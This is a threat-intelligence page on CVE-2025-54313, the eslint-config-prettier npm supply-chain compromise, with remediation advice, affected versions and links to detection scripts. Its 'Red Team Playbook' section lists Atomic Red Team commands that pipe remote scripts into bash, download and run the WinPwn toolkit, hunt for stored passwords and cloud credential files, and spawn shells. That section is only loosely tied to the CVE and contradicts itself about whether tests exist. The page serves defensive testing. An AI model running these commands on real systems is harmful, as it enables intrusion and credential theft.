CVE-2025-54313
Overview
This vulnerability is a supply chain compromise involving malicious code embedded within specific versions of the eslint-config-prettier npm package. The root cause is the inclusion of a malicious install.js script that executes automatically during package installation. This script triggers execution of a node-gyp.dll malware payload on Windows environments, affecting the package's installation process and the integrity of the affected component.
Vulnerability Description
eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, and 10.1.7 has embedded malicious code for a supply chain compromise. Installing an affected package executes an install.js file that launches the node-gyp.dll malware on Windows.
Impact
An attacker can achieve remote code execution on Windows systems by tricking users or automated systems into installing one of the compromised eslint-config-prettier package versions. No authentication or user interaction beyond package installation is required. This enables execution of arbitrary malicious code, potentially leading to system compromise, data theft, or further lateral movement within development environments. The attack undermines software supply chain trust, affecting developers and CI/CD pipelines relying on these npm packages.
Solution
Users should immediately upgrade eslint-config-prettier to versions later than 10.1.7, where the malicious code has been removed. Refer to the official GitHub issue #339 on the prettier/eslint-config-prettier repository for detailed remediation guidance. Additional information and advisories are available via the socket.dev blog and bleepingcomputer.com articles linked in the references. Avoid using affected versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7 until patched versions are confirmed safe.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the eslint-config-prettier package and its variants represents a significant threat to the integrity of software supply chains. This issue arises from the inclusion of malicious code within the install.js file of the affected versions, which, when executed during the installation process, activates the node-gyp.dll malware on Windows systems. The malicious payload is designed to compromise the host environment, potentially leading to unauthorized access, data exfiltration, or further propagation of malicious activities. The nature of this vulnerability highlights the risks inherent in relying on third-party packages, especially in environments where security practices may not be rigorously enforced.
Attack vectors for this vulnerability are multifaceted. An attacker could exploit the compromised package by distributing it through popular package repositories, where developers frequently source dependencies for their projects. Once a developer installs an affected version of eslint-config-prettier or any of its related plugins, the malicious install.js file is executed automatically. This could occur in various scenarios, including continuous integration/continuous deployment (CI/CD) pipelines, where automated processes may not adequately scrutinize the integrity of the packages being installed. Additionally, if the malware is designed to establish a foothold on the system, it could facilitate further attacks, such as lateral movement within a network or the deployment of additional malicious payloads.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Node.js and its ecosystem for application development. The potential for data breaches, loss of intellectual property, and damage to brand reputation poses significant business risks. Organizations may face regulatory repercussions if sensitive data is compromised, leading to financial penalties and loss of customer trust. Furthermore, the operational disruption caused by a successful attack could result in substantial downtime and recovery costs. The interconnected nature of software dependencies means that the effects of such a compromise could ripple through multiple projects and teams, amplifying the overall risk to the organization.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a robust security posture that includes regular audits of third-party dependencies. Utilizing tools that can analyze package integrity and monitor for known vulnerabilities is essential. Additionally, employing a software composition analysis (SCA) tool can help identify and remediate compromised packages before they are deployed in production environments. Organizations should also consider adopting a policy of least privilege for development environments, ensuring that installations of packages are performed in isolated environments where potential damage can be contained. Regular training and awareness programs for developers regarding the risks of supply chain attacks can further enhance the organization's security posture.
In conclusion, the vulnerability within the eslint-config-prettier package underscores the critical need for vigilance in software supply chain management. As the landscape of software development continues to evolve, so too do the tactics employed by malicious actors. By understanding the technical details of such vulnerabilities, recognizing potential attack vectors, assessing real-world impacts, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the growing threat of supply chain compromises. The proactive approach to security will not only safeguard organizational assets but also foster a culture of security awareness among developers and stakeholders alike.
CSURFACE threat intelligence has identified a marked increase in the exploitability of CVE-2025-54313, as reflected by the 19.5% rise in the Exploit Prediction Scoring System (EPSS) score, now positioned in the 94th percentile. This shift corresponds with the emergence of new proof-of-concept tools designed to detect and leverage the malicious code embedded in affected versions of eslint-config-prettier. Our telemetry indicates that these tools have broadened the attack surface by simplifying identification of compromised packages and the associated node-gyp.dll malware on Windows platforms. Although the short-term trend shows a slight decrease in exploitation attempts, the overall elevated EPSS score and recent inclusion in the Known Exploited Vulnerabilities (KEV) catalog underscore a sustained and credible threat. This evolution matters significantly for defenders because it signals increased attacker capability and accessibility, heightening the risk of supply chain compromise through widely used open-source components. Consequently, the threat level for organizations relying on prettier eslint-config-prettier has escalated from moderate to high, necessitating heightened vigilance in monitoring software dependencies and supply chain integrity.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Prettier | Eslint-Config-Prettier | 8.10.1 |
cpe:2.3:a:prettier:eslint-config-prettier:8.10.1:*:*:*:*:node.js:*:*
|
|
|
Prettier | Eslint-Config-Prettier | 9.1.1 |
cpe:2.3:a:prettier:eslint-config-prettier:9.1.1:*:*:*:*:node.js:*:*
|
|
|
Prettier | Eslint-Config-Prettier | 10.1.6 |
cpe:2.3:a:prettier:eslint-config-prettier:10.1.6:*:*:*:*:node.js:*:*
|
|
|
Prettier | Eslint-Config-Prettier | 10.1.7 |
cpe:2.3:a:prettier:eslint-config-prettier:10.1.7:*:*:*:*:node.js:*:*
|
|
|
Prettier | Eslint-Plugin-Prettier | 4.2.2 |
cpe:2.3:a:prettier:eslint-plugin-prettier:4.2.2:*:*:*:*:node.js:*:*
|
|
|
Prettier | Eslint-Plugin-Prettier | 4.2.3 |
cpe:2.3:a:prettier:eslint-plugin-prettier:4.2.3:*:*:*:*:node.js:*:*
|
|
|
Un-Ts | Synckit | 0.11.9 |
cpe:2.3:a:un-ts:synckit:0.11.9:*:*:*:*:node.js:*:*
|
|
|
Un-Ts | Pkgr\/core | 0.2.8 |
cpe:2.3:a:un-ts:pkgr\/core:0.2.8:*:*:*:*:node.js:*:*
|
|
|
Alexghr | Got-Fetch | 5.1.1 |
cpe:2.3:a:alexghr:got-fetch:5.1.1:*:*:*:*:node.js:*:*
|
|
|
Alexghr | Got-Fetch | 5.1.2 |
cpe:2.3:a:alexghr:got-fetch:5.1.2:*:*:*:*:node.js:*:*
|
|
|
Un-Ts | Napi-Postinstall | 0.3.1 |
cpe:2.3:a:un-ts:napi-postinstall:0.3.1:*:*:*:*:node.js:*:*
|
|
|
Homarr | Homarr | All |
cpe:2.3:a:homarr:homarr:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Paspke/scavenger_scanner
Detect CVE-2025-54313 eslint-config-prettier supply chain attack IOCs on Windows
|
Paspke | 0 | 0 | 2025-07-26 | View |
|
ShinP451/scavenger_scanner
Detect CVE-2025-54313 eslint-config-prettier supply chain attack IOCs on Windows
|
ShinP451 | 0 | 0 | 2025-07-26 | View |
|
nihilor/cve-2025-54313
Checks projects for compromised packages, suspicious files, and import statements.
|
nihilor | 0 | 0 | 2025-07-26 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
41%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
38%
|
— | High | |
| CAPEC-448 | Embed Virus into DLL |
35%
|
Medium | High |
Red Team Playbook
45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.